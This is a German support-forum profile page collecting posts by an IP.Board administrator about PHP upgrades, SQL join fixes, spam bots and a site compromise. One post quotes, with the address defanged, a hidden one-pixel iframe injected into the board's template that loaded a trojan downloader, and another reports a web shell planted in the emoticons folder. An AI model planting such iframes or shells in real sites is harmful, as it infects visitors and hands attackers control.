Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support

gonzo

Mitglied
  • Content count

    24
  • Joined

  • Last visited

About gonzo

  • Rank
    Grünschnabel

IP.Board Informationen

  • IP.Board Version
    1.3.x
  1. Hallo Helge, das ist die Hilfe beim Upgrade von SQL4 auf SQL5. Ich habe das Problem dass ich von PHP4 auf PHP5 muß. Durch deinen genialen Link habe ich aber die richtige Spur gefunden. Ich muß anscheinend den Patch hier reinklopfen: http://www.ibforen.de/index.php?ind=downlo...iew&iden=45 TAUSEND DANK!!!
  2. Hallo, ich hoffe mir kann hier jemand helfen. Mein Provider Host Europe hat zum Jahresende die Unterstüzung für PHP 4 abgeschaltet. Jetzt kann sich niemand mehr am Forum anmelden und auch keine Beiträge mehr lesen. Siehe : http://www.libriamici.de Fehler bekomm ich leider keinen angezeigt!
  3. Oh mein Gott!!! Ich habe es gefunden: Für alle die auch mal drüber stolpern: Bei hosteurope muß man für den Webspace die PHP4 Endungen aktivieren. Für php5 sind diese Standardmäßig aktiviert: PHP4-Extensions einstellen: "php5 php4 php3 php" Bin HAPPY :D :D
  4. NEIN, leider nicht. Du hast auf dich über den einzig noch funktionierenden Link auf www.juergen-baur.de/libri/forum angemeldet. Das ist das alte Forum!! Das neue Forum ist unter www.libriamici.de zu finden ICH BRAUCHE IMMER NOCH DRINGEND HILFE! Danke!
  5. Hallo, ich bin innerhalb von hosteurope auf einen anderen Webspace umgezogen. SQL dump gemacht Filesicherung gemacht Files hochgespielt SQL`s eingespielt config angepasst. Das Forum startet jetzt auch und zeigt 2 neue Threads an (wie vor dem Umzug). Das heißt die Datenbank kann ausgelesen werden. Leider reagiert das Forum aber nicht wenn man sich einloggen will oder auf eine Thread klickt. Im Errorlog des Provider wird auch nix gemeldet. Ich bin jetzt sehr ratlos was da los ist. Hier die Adresse: http://www.libriamici.de
  6. Hab das Problem gefunden: Es liegt an der MYSQL Version, die anscheinend der Provider neu installiert hat. Diese Version akzeptiert keine Kommas mehr, sondern nur noch INNER JOIN. @MasterShadow Dein Code muß so lauten: FROM ibf_topics t INNER JOIN ibf_polls p LEFT JOIN ibf_voters Anstatt: FROM ibf_topics t, ibf_polls p LEFT JOIN ibf_voters
  7. Habe das gleiche Problem, aus dem Nichts. *HILFE* :(
  8. DANKE AN EUCH!! JA, es ist eine RootShell im Emoticons Verzeichnis gelandet! Boa, hab jetzt einfach die Berechtigungen des Verzeichnisses geändert und die "info.php" -> so hat sich die Shell genannt gelöscht.
  9. Hi Modula, danke für das Feedback. 1. Nein - ich dachte 1.3 wird nicht mehr supported (wo kann ich die Dinger downloaden?) 2. Ja / Zahlen Buchstabenkombination > 8 Zeichen 3. Erkläre mir das bitte genauer, ist das emoticons verzeichnis ne Schwachstelle?
  10. Hallo meine Lieben , <iframe src="tttp://surka.info/index.php?adv=17" width=1 height=1></iframe> Diesen Eintrag mußte ich im Wrapper sehen, nachdem ich Beschwerden bekam, dass mein Board mit einem Virus infiziert ist ---> JS/Downloader-AUD (Trojanisches Pferd) Ich habe die Adresse vorsichtshalber für euch hier mit tttp verändert, damit sich keiner nen Virus einfängt. Wie kam das Drecksteil da rein ?? Meine Boardadresse: http://www.libriamici.de So sah es genau aus: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <iframe src="tttp://surka.info/index.php?adv=17" width=1 height=1></iframe> <title><% TITLE %></title> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" lang="de"> <meta name="description" content="Buchforum und Literaturforum"> <meta name="author" content="Baur Jürgen"> <meta name="robots" content="index, follow"> <meta name="keywords" content="libriamici forum, Forum, forum, und weiter unten vor dem Bodyteil nochmal.
  11. Naja, ich habe da zig .com Adressen und diese sind immer neu. Ich kann ja nicht den ganzen .com Bereich sperren. Ich bin da immer einen Schritt langsamer. Ich fhabe ein Literaturforum und in dem wurden gestern von SPAM Bots Nacktfotos geposted. Das finden User, die über Literatur sprechen wollen nicht lustig. Ich weiß da jetzt echt nicht mehr weiter. .ru und den ganzen Schrott habe ich ja eh schon komplett gesperrt. Namen mit *porn* *viagra* etc. auch. Dennoch kommen in 24 Std. ca. 2 -3 durch, die dann das Forum versauen. Rigo, wenn es Dir nichts ausmacht, kannst Du hier die Ausschlüsse die bei deinen foren ein Gro abfangen, mal posten? Ich würds dann gern nochmal mit TTF und Mail versuchen. Danke Dir!
  12. Hallo, bei mir melden sich massenhaft russiche Spambots an. Und das obwohl ich die TTF Methode und Mail Aktivierung eingestellt habe. Einige bleiben als validating hängen, viele kommen aber durch und posten mit mit Schrott das Forum tod. Username und mailadressen bzw. tld`s sperren kommt da nicht mehr in Frage. Ich musste jetzt auf manuelle Freischaltung durch Admin umstellen, um das Problem in den Griff zu bekommen. Hat jemand eine bessere Lösung? Bin am verzweifeln.
  13. Ich habe es doch noch gefunden, sorry, hoffe das funktioniert auch: http://www.ipbsupport.de/board/index.php?showtopic=797
  14. Wie kann ich denn die Forenstruktur anzeigen lassen, aber nur registrierten Benutzern das Lesen der Foreninhalte erlauben? Wenn ich bei den einzelnen Foren für gäste das Lesen ausschalte wird gleich das ganze Forum ausgeblendet. So sehen die ja gar nicht was für tolle Foren es gibt, weshalb sich dann natürlich auch keiner Anmeldet.
  15. Ich habe die Suche bemüht, aber nur die Änderung für eine bestimmte Mod gefunden. Was muss ich in der Standard 1.3 machen, damit Gäste auch voten dürfen?
×